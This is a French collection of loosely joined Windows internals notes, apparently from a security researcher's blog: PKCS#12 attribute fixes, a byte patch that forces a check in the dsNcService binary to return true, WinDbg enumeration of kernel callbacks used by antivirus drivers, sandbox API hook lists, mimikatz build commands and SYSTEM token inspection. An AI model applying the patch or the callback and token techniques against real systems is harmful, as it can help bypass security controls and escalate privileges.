ASN1 fin de données inattendue. 0×80093102 (ASN: 258)

Pourtant ce certificat peut très bien être utilisé par l’autorité…
Malgré ce Windows trop sur de lui, ce n’est pas le certificat qui ne peut être utilisé, mais le conteneur PKCS#12 qui ne contient pas les données attendues par le service…

Voici les attributs de clé contenu dans notre « P12″, précédemment généré par OpenSSL, xca ou autres logiciels cryptographique digne de ce nom :

Offset| Len  |LenByte|
======+======+=======+======================================================================
  4195|    62|      1| SET :
  4197|    23|      1|    SEQUENCE :
  4199|     9|      1|       OBJECT IDENTIFIER : friendlyName [1.2.840.113549.1.9.20]
  4210|    10|      1|       SET :
  4212|     8|      1|          BMP STRING : 'acms'
  4222|    35|      1|    SEQUENCE :
  4224|     9|      1|       OBJECT IDENTIFIER : localKeyID [1.2.840.113549.1.9.21]
  4235|    22|      1|       SET :
  4237|    20|      1|          OCTET STRING :
      |      |       |             9A499BFB3E6AACE88638381E253C15190BC16FDD

ou via OpenSSL :

Bag Attributes
    friendlyName: acms
    localKeyID: 9A 49 9B FB 3E 6A AC E8 86 38 38 1E 25 3C 15 19 0B C1 6F DD
Key Attributes: <No Attributes>

Pour n’importe quel autre logiciel cryptographique, cela suffirait amplement…. mais non, Microsoft semble rester sur sa faim avec ce P12…
Reconstruisons un autre avec le même certificat, la même clé, mais avec d’autres attributs :

• Local Machine Keyset (-LMK)
• Cryptographic Service Providers (-CSP x)
• Friendly Name (-name)

Le fichier .p12 est conservé, un nouveau .pfx est créé.

openssl pkcs12 -password pass:XXXX -in acms.p12 -out acms.pem -clcerts -nodes
openssl pkcs12 -in acms.pem -password pass:XXXX -out acms.pfx -name "ac ms" -CSP "Microsoft Software Key Storage Provider" -LMK -export

Remarques :

• ne pas oublier de supprimer minutieusement le fichier acms.pem
• Le fournisseur « Microsoft Software Key Storage Provider » n’est disponible que sous NT 6, il doit malheureusement être remplacé par « Microsoft Enhanced RSA and AES Cryptographic Provider » avant

Voici les nouveaux attributs de clé :

Offset| Len  |LenByte|
======+======+=======+======================================================================
  4195|   174|      2| SET :
  4198|    13|      1|    SEQUENCE :
  4200|     9|      1|       OBJECT IDENTIFIER :  [1.3.6.1.4.1.311.17.2]
  4211|     0|      1|       SET : ''
  4213|    25|      1|    SEQUENCE :
  4215|     9|      1|       OBJECT IDENTIFIER : friendlyName [1.2.840.113549.1.9.20]
  4226|    12|      1|       SET :
  4228|    10|      1|          BMP STRING : 'ac ms'
  4240|    35|      1|    SEQUENCE :
  4242|     9|      1|       OBJECT IDENTIFIER : localKeyID [1.2.840.113549.1.9.21]
  4253|    22|      1|       SET :
  4255|    20|      1|          OCTET STRING :
      |      |       |             9A499BFB3E6AACE88638381E253C15190BC16FDD
  4277|    93|      1|    SEQUENCE :
  4279|     9|      1|       OBJECT IDENTIFIER : szOID_LOCAL_MACHINE_KEYSET [1.3.6.1.4.1.311.17.1]
  4290|    80|      1|       SET :
  4292|    78|      1|          BMP STRING :
      |      |       |             'Microsoft Software Key Storage Provider'

ou via OpenSSL :

Bag Attributes
    Microsoft Local Key set: <No Values>
    friendlyName: ac ms
    localKeyID: 9A 49 9B FB 3E 6A AC E8 86 38 38 1E 25 3C 15 19 0B C1 6F DD
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes: <No Attributes>

Cette fois, le PFX est correctement importé et utilisable. Le cas échéant, il faudra aller supprimer l’ancien certificat déjà importé.

Pour plus de précisions dans le service dsNcService :

• Remplacer {0x83, 0xec, 0x1c, 0x55, 0x8b, 0xe9}; // 7.0 // 83 ec 1c 55 8b e9
• ou bien {0x83, 0xec, 0x14, 0x53, 0x8b, 0xd9}; // 7.1 // 83 ec 14 53 8b d9
• par : {0xb0, 0x01, 0xc2, 0x04, 0x00}

Les hooks SSDT en mode noyau n’ont plus le vent en poupe, merci PatchGard :)
Nos éditeurs antivirus et HIPS n’ont plus vraiment le choix (du moins en x64), ils doivent passer par les notifications kernel offertes par Microsoft.
(en revanche rien n’empêche d’implémenter en sus des hooks userland)

• Processus
• Threads
• Images
• Registre
• Fichiers (via minifiltres !

Processus

La mise en place de ces notifications se fait via les méthodes suivantes :

• PsSetCreateProcessNotifyRoutine
• PsSetCreateProcessNotifyRoutineEx
  • Cette routine, seulement disponible en NT6, est plus souple et offre un contrôle avant lancement du processus :
    

    For a new process, the CreateProcessNotifyEx routine is called after the initial thread is created, but before the thread begins running. The driver can cause the process-creation operation to fail by changing the CreateInfo->CreationStatus member to an NTSTATUS error code.

Le détachement de la routine de notification se fait par la même méthode que l’attachement : PsSetCreateProcessNotifyRoutine[ex], l’on spécifie seulement Remove = TRUE pour le deuxième argument.

Limitation étrange

• NT5 : au maximum 8 callbacks, sous peine de se voir retourner STATUS_PROCEDURE_NOT_FOUND ; 0xC000007A

  PAGE:00597BFE                 cmp     ebx, 8
  PAGE:00597C01                 jb      short loc_597BCF
  PAGE:00597C03                 mov     eax, 0C000007Ah

• NT6 : au maximum 64 callbacks, sous peine de se voir retourner STATUS_PROCEDURE_NOT_FOUND ; 0xC000007A
  Cette augmentation est la bienvenue puisque Windows lui même en utilise 6 par défaut, 7 avec MSE…

Retrouvons nos routines dans notre débogueur préféré

Légende :

• PspCreateProcessNotifyRoutineCount ; nombre de callbacks créés par PsSetCreateProcessNotifyRoutine
• PspCreateProcessNotifyRoutineExCount ; nombre de callbacks créés par PsSetCreateProcessNotifyRoutineEx
• PspCreateProcessNotifyRoutine ; tableau de pointeurs des callbacks (avec 3 bits de contrôle), décalé de 4 octets en 32 bits

lkd> dd nt!PspCreateProcessNotifyRoutineCount l1
fffff800`01678184  00000005
lkd> dd nt!PspCreateProcessNotifyRoutineExCount l1
fffff800`01678180  00000001
lkd> dp nt!PspCreateProcessNotifyRoutine l6
fffff800`01677f80  fffff8a0`00004c0f fffff8a0`0024c15f
fffff800`01677f90  fffff8a0`0015cbef fffff8a0`000797ff
fffff800`01677fa0  fffff8a0`00381c4f fffff8a0`06e0e3df

Regardons de plus près ces callbacks (sortie épurée pour faciliter la compréhension) :

lkd> ln poi(@@(0xfffff8a000004c0f & ~7))
    nt!ViCreateProcessCallback = <no type information>
lkd> ln poi(@@(0xfffff8a00024c15f & ~7))
    ksecdd!KsecCreateProcessNotifyRoutine = <no type information>
lkd> ln poi(@@(0xfffff8a00015cbef & ~7))
    cng!CngCreateProcessNotifyRoutine = <no type information>
lkd> ln poi(@@(0xfffff8a0000797ff & ~7))
    tcpip!CreateProcessNotifyRoutineEx = <no type information>
lkd> ln poi(@@(0xfffff8a000381c4f & ~7))
    CI!I_PEProcessNotify = <no type information>
lkd> ln poi(@@(0xfffff8a006e0e3df & ~7))
lkd> lm f a (poi(@@(0xfffff8a006e0e3df & ~7)))
start             end                 module name
fffff880`034f8000 fffff880`0359e000   peauth   \SystemRoot\system32\drivers\peauth.sys

Un petit exemple en 32 bits pour faire apparaitre le décalage de 4 octets du pointeur, et le pilote de MSE / FEP :

lkd> dp nt!PspCreateProcessNotifyRoutine l9
829799a0  87c08ec7 87c5ee5f 87c4db57 88c897c7
829799b0  87db97ef 88c69117 87d13e27 93f4e867
829799c0  97497857
lkd> ln poi(@@(0x87c08ec7 & ~7) + 4)
    nt!ViCreateProcessCallback = <no type information>
lkd> ln poi(@@(0x97497857 & ~7) + 4)
lkd> lm f a (poi(@@(0x97497857 & ~7) + 4))
start    end        module name
947b1000 947d7800   MpFilter \SystemRoot\system32\DRIVERS\MpFilter.sys

Threads

• PsSetCreateThreadNotifyRoutine
• PsRemoveCreateThreadNotifyRoutine

Limitation étrange

Encore une fois…

• NT5 : au maximum 8 callbacks, sous peine de se voir retourner STATUS_INSUFFICIENT_RESOURCES ; 0xC000009A
• NT6 : au maximum 64 callbacks, sous peine de se voir retourner STATUS_INSUFFICIENT_RESOURCES ; 0xC000009A

Retrouvons nos routines dans notre débogueur préféré

Légende :

• PspCreateThreadNotifyRoutineCount ; nombre de callbacks créés par PsSetCreateThreadNotifyRoutine
• PspCreateThreadNotifyRoutine ; tableau de pointeurs des callbacks (avec 3 bits de contrôle), décalé de 4 octets en 32 bits

lkd> dd nt!PspCreateThreadNotifyRoutineCount l1
82979980  00000002
lkd> dp nt!PspCreateThreadNotifyRoutine l2
82979880  87ce05ef 98861407
lkd> ln poi(@@(0x98861407 & ~7) + 4)
lkd> lm f a (poi(@@(0x98861407 & ~7) + 4))
start    end        module name
947b1000 947d7800   MpFilter \SystemRoot\system32\DRIVERS\MpFilter.sys

Images

• PsSetLoadImageNotifyRoutine
• PsRemoveLoadImageNotifyRoutine

Limitation étrange

Ils devaient manquer de mémoire chez Microsoft ;)

• NT5 : au maximum 8 callbacks, sous peine de se voir retourner STATUS_INSUFFICIENT_RESOURCES ; 0xC000009A
• NT6 : au maximum 8 (?) callbacks, sous peine de se voir retourner STATUS_INSUFFICIENT_RESOURCES ; 0xC000009A

Retrouvons nos routines dans notre débogueur préféré

Légende :

• PspLoadImageNotifyRoutineCount ; nombre de callbacks créés par PsSetLoadImageNotifyRoutine
• PspLoadImageNotifyRoutine ; tableau de pointeurs des callbacks (avec 3 bits de contrôle), décalé de 4 octets en 32 bits

lkd> dd nt!PspLoadImageNotifyRoutineCount l1
fffff800`01677d40  00000001
lkd> dp nt!PspLoadImageNotifyRoutine l1
fffff800`01677d00  fffff8a0`0006af0f
lkd> ln poi(@@(0xfffff8a00006af0f & ~7))
    nt!EtwpTraceLoadImage = <no type information>

Registre

• CmRegisterCallback
• CmRegisterCallbackEx
• CmUnRegisterCallback

Limitation étrange

Microsoft s’est montré un peu plus généreux cette fois ci…

• NT5 : au maximum 100 callbacks, sous peine de se voir retourner STATUS_INSUFFICIENT_RESOURCES ; 0xC000009A
• NT6 : a priori pas de limitations (?), les callbacks ne sont plus ici stockés dans un tableau statique, mais dans une liste liée dynamique

Retrouvons nos routines dans notre débogueur préféré

Légende :

• CmpCallBackCount ; nombre de callbacks créés par CmRegisterCallback(Ex), inutile en NT6 ou la liste liée suffit à parcourir les callbacks
• CmpCallBackVector ; NT5 ; tableau de pointeurs des callbacks (avec 3 bits de contrôle), décalé de 4 octets en 32 bits
• CallbackListHead ; NT6 ; liste liée de structure des callbacks

Les callbacks créés sont identifiés par un cookie, et pour NT6 disposent d'une altitude.

NT5

lkd> dd nt!CmpCallBackCount l1
809d8000  00000001
lkd> dp nt!CmpCallBackVector l1
809d8008  e2317b9f
lkd> lm f a (poi(@@(0xe2317b9f& ~7) + 4))
start    end        module name
f5b04000 f5b0fc00   PROCMON20 \??\C:\WINDOWS\system32\Drivers\PROCMON20.SYS
lkd> dq (poi(@@(0xe2317b9f& ~7) + 8)) l1
e2dc0930  01ccc33c`b6b63089

NT6

lkd> dd nt!CmpCallBackCount l1
fffff800`02e57ae4  00000002
lkd> x nt!CallbackListHead
fffff800`02ecc910 nt!CallbackListHead = <no type information>
lkd> dt nt!_LIST_ENTRY 0xfffff800`02ecc910
 [ 0xfffff8a0`02808080 - 0xfffff8a0`05d750d0 ]
   +0x000 Flink            : 0xfffff8a0`02808080 _LIST_ENTRY [ 0xfffff8a0`05d750d0 - 0xfffff800`02ecc910 ]
   +0x008 Blink            : 0xfffff8a0`05d750d0 _LIST_ENTRY [ 0xfffff800`02ecc910 - 0xfffff8a0`02808080 ]
lkd> dq 0xfffff8a0`02808080 l8
fffff8a0`02808080  fffff8a0`05d750d0 fffff800`02ecc910
fffff8a0`02808090  10000000`00000000 01ccc334`922c6342
fffff8a0`028080a0  00000000`00000000 fffff880`0450e9b8
fffff8a0`028080b0  fffff8a0`000c000c fffff8a0`01a3d220
lkd> lm f a (poi(0xfffff8a0`02808080+0x28))
start             end                 module name
fffff880`044f3000 fffff880`04524000   MpFilter \SystemRoot\system32\DRIVERS\MpFilter.sys
lkd> !ustr 0xfffff8a0`02808080+0x30
String(12,12) at fffff8a0028080b0: 425000
lkd> dq 0xfffff8a0`02808080+0x18 l1
fffff8a0`02808098  01ccc334`922c6342
lkd> dq 0xfffff8a0`05d750d0 l8
fffff8a0`05d750d0  fffff800`02ecc910 fffff8a0`02808080
fffff8a0`05d750e0  42424242`00000000 01ccc334`922c6343
fffff8a0`05d750f0  00000000`00000000 fffff880`071d69d0
fffff8a0`05d75100  42424242`000c000c fffff8a0`056a5cf0
lkd> lm f a (poi(0xfffff8a0`05d750d0+0x28))
start             end                 module name
fffff880`071d0000 fffff880`071e4000   PROCMON20 \??\C:\Windows\system32\Drivers\PROCMON20.SYS
lkd> !ustr 0xfffff8a0`05d750d0+0x30
String(12,12) at fffff8a005d75100: 425000
lkd> dq 0xfffff8a0`05d750d0+0x18 l1
fffff8a0`05d750e8  01ccc334`922c6343

** BROUILLON **

Fichier

• FltRegisterFilter
• FltStartFiltering
• FltUnregisterFilter

(vous pourrez par ailleurs trouver sur le site WHDC de Microsoft les altitudes alloués par Microsoft à différents produits...)

** BROUILLON **

Cet article ne le détaillera pas, mais il est tout à fais possible d’alterner une fonction hookée et une plus personnelle afin de sortir des fichiers de la bulle, d’en faire rentrer ou exécuter des programmes non autorisés.

• Registre (advapi32), via InterceptRegistryFunctions :
  • RegCreateKeyExW
  • RegCreateKeyExA
  • RegOpenKeyExW
  • RegOpenKeyExA
  • RegCloseKey
  • RegSetValueExW
  • RegDeleteKeyW
  • RegDeleteKeyA
  • RegDeleteValueW
  • RegEnumKeyExW
  • RegEnumValueW
  • RegQueryInfoKeyW
  • RegQueryMultipleValuesW
  • RegQueryValueExW
  • RegQueryValueW
  • RegReplaceKeyW
  • RegRestoreKeyW
  • RegSaveKeyW
  • RegSetKeySecurity
  • RegOpenCurrentUser
  • SetNamedSecurityInfoW
  • GetNamedSecurityInfoW
• Appels noyau (ntdll), via InterceptNativeFunctions :
  • NtCreateFile
  • NtOpenFile
  • NtClose
  • NtQueryInformationFile
  • NtSetInformationFile
  • NtQueryDirectoryFile
  • NtQueryAttributesFile
  • NtQueryFullAttributesFile
  • NtReadFile
  • NtWriteFile
  • NtMapViewOfSection
  • NtUnmapViewOfSection
  • NtCreateSection
  • NtOpenSection
  • NtQuerySection
• Fichier et mémoire (kernel32/user32), via InterceptFileFunctions
  • FindFirstFileExW
  • FindFirstFileW
  • FindNextFileW
  • FindClose
  • SetFileAttributesW
  • GetFileAttributesW
  • GetFileAttributesExW
  • DeleteFileW
  • MoveFileW
  • MoveFileExW
  • MoveFileWithProgressW
  • CreateHardLinkW
  • CopyFileW
  • CopyFileExW
  • CreateDirectoryW
  • CreateDirectoryExW
  • RemoveDirectoryW
  • CreateFileW
  • SetEndOfFile
  • CloseHandle
  • FindFirstChangeNotificationW
  • ReadDirectoryChangesW
  • WriteProcessMemory
  • ReadProcessMemory
  • LoadLibraryExW
  • DuplicateHandle
  • FlushViewOfFile
  • VirtualAlloc
  • SwitchDesktop
• Impression (gdi32/winspool), via InterceptDeviceFunctions
  • CreateDCW
  • OpenPrinterW
  • EnumPrintersW
  • GetDefaultPrinterW
  • AddPrinterDriverW
  • AddPrinterDriverExW
  • WritePrinter
• Presse-papier (user32), via InterceptClipboardFunctions
  • OpenClipboard
  • CloseClipboard
  • EmptyClipboard
  • ChangeClipboardChain
  • CountClipboardFormats
  • GetClipboardOwner
  • EnumClipboardFormats
  • GetClipboardData
  • GetClipboardFormatNameA
  • GetClipboardFormatNameW
  • GetClipboardSequenceNumber
  • GetClipboardViewer
  • GetOpenClipboardWindow
  • GetPriorityClipboardFormat
  • IsClipboardFormatAvailable
  • RegisterClipboardFormatA
  • RegisterClipboardFormatW
  • SetClipboardData
  • SetClipboardViewer
• Processus (kernel32/advapi32/ole32), via InterceptProcessFunctions
  • CreateProcessA
  • CreateProcessW
  • CreateProcessAsUserA
  • CreateProcessAsUserW
  • WinExec
  • ExitWindowsEx
  • ShellExecuteExW
  • CoGetClassObject
  • CoCreateInstanceEx
  • CreateProcessWithLogonW
  • OleRun

vcvarsall.bat x86

msbuild mimikatz.sln /target:Rebuild /property:Configuration=Release /property:Platform=Win32 /verbosity:d

vcvarsall.bat x86_amd64

msbuild mimikatz.sln /target:Rebuild /property:Configuration=Release /property:Platform=x64 /verbosity:d

En plus ça fait de jolies couleurs :)

Par exemple, via le fichier RC :

42	RCDATA	"../release/fichier.dll"

Puis ce bout de code :

bool RSCRCtoFile(DWORD id, const wchar_t * file)
{
	bool reussite = false;
	if(HRSRC maRefRessource = FindResource(NULL, MAKEINTRESOURCE(id), RT_RCDATA))
	{
		if(DWORD tailleRessource = SizeofResource(NULL, maRefRessource))
		{
			if(HGLOBAL maRessource = LoadResource(NULL, maRefRessource))
			{
				if(LPVOID ptrRessource = LockResource(maRessource))
				{
					if(HANDLE hFile = CreateFile(file, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL))
					{
						DWORD dwBytesWritten;
						reussite = WriteFile(hFile, ptrRessource, tailleRessource, &dwBytesWritten, NULL) != 0;
						CloseHandle(hFile);
					}
				}
				FreeResource(maRessource);
			}
		}
	}
	return reussite;
}

Référence : http://msdn.microsoft.com/library/ff468901.aspx

Visiblement chez Kaspersky on a le sens de lulz dans les segments de kl1.sys…

Il est judicieux séparer les composants JDK et IDE :

• JDK : http://www.oracle.com/technetwork/java/javase/downloads/
  prendre le JDK (pas le JRE), en version x86 ou x64, selon vos croyances
• IDE : http://netbeans.org/downloads/
  a priori la version Java SE, Français, sous Windows

Quelques librairies à avoir :

• BouncyCastle : http://www.bouncycastle.org/latest_releases.html
• Apache HTTP Components : http://hc.apache.org/
• Args4j : http://args4j.kohsuke.org/

• Visual Studio 2010 Express : vs2010expressfra.iso
• son SP1 : vs2010sp1dvd1.iso
• Les redistribuables : vcredist_x86.exe et vcredist_x64.exe
  (ne pas oublier de faire les mises à jour)

Les versions Express des outils Microsoft sont des versions allégées, sans limite d’utilisation dans le temps : http://www.microsoft.com/express

Certaines fonctionnalités ne sont pas disponibles : http://msdn.microsoft.com/library/hs24szh9.aspx (comme la compilation x64 ou les MFC pour Visual C++)

En bonus pratique :

• Le SDK Windows : grmsdk_en_dvd.iso (x86) et grmsdkx_en_dvd.iso (x64)
• Le WDK Windows : grmwdk_en_7600_1.iso

Par extensions

Processus ‘system’

lkd> !process 0 1 system
PROCESS 82da3648  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00e02000  ObjectTable: e1001c58  HandleCount: 614.
    Image: System
    VadRoot 82a6e0f0 Vads 4 Clone 0 Private 3. Modified 11050. Locked 0.
    DeviceMap e10000a8
    Token                             e1000758
[...]

Jeton de sécurité du processus

lkd> !token -n 0xe1000758
_TOKEN e1000758
TS Session ID: 0
User: S-1-5-18 (Well Known Group: AUTORITE NT\SYSTEM)
[...]
Authentication ID:         (0,3e7)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: *SYSTEM*           TokenFlags: 0x89 ( Token NOT in use )
Token ID: 3ea              ParentToken ID: 0
Modified ID:               (0, 3e9)
RestrictedSidCount: 0      RestrictedSids: 00000000
OriginatingLogonSession: 0

Par accès direct en mémoire

Processus ‘system’

lkd> dt nt!_eprocess poi(PsInitialSystemProcess)
[...]
   +0x094 UniqueProcessId  : 0x00000004 Void
[...]
   +0x0d8 Token            : _EX_FAST_REF
[...]
   +0x164 ImageFileName    : [16]  "System"
[...]

Référence au token de sécurité par structure ‘ex_fast_ref’

lkd> dt nt!_ex_fast_ref poi(PsInitialSystemProcess)+0x0d8
   +0x000 Object           : 0xe100075d Void
   +0x000 RefCnt           : 0y101
   +0x000 Value            : 0xe100075d

Jeton de sécurité du processus (avec application du masque sur le compteur)

• En x86, masque de 3 bits : dt nt!_token -r1 @@(0xe100075d & ~7)
• En x64, masque de 4 bits : dt nt!_token -r1 @@(0xfffff8a000004048 & ~15)

lkd> dt nt!_token -r1 @@(0xe100075d & ~7)
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8]  "*SYSTEM*"
      +0x008 SourceIdentifier : _LUID
   +0x010 TokenId          : _LUID
      +0x000 LowPart          : 0x3ea
      +0x004 HighPart         : 0n0
   +0x018 AuthenticationId : _LUID
      +0x000 LowPart          : 0x3e7
      +0x004 HighPart         : 0n0
   +0x020 ParentTokenId    : _LUID
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0n0
[...]
   +0x040 ModifiedId       : _LUID
      +0x000 LowPart          : 0x3e9
      +0x004 HighPart         : 0n0
   +0x048 SessionId        : 0
[...]
   +0x080 TokenType        : 1 ( TokenPrimary )
   +0x084 ImpersonationLevel : 0 ( SecurityAnonymous )
   +0x088 TokenFlags       : 0x89 ''
   +0x089 TokenInUse       : 0 ''
[...]